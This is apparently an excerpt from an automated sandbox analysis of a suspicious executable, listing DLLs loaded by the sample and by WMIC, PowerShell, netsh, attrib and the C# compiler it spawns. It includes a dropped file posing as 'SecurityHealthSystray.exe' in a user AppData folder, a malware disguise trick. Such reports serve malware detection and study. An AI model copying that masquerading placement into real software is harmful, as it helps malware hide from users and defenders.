                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeSection loaded: powrprof.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeSection loaded: powrprof.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                      Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                      Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
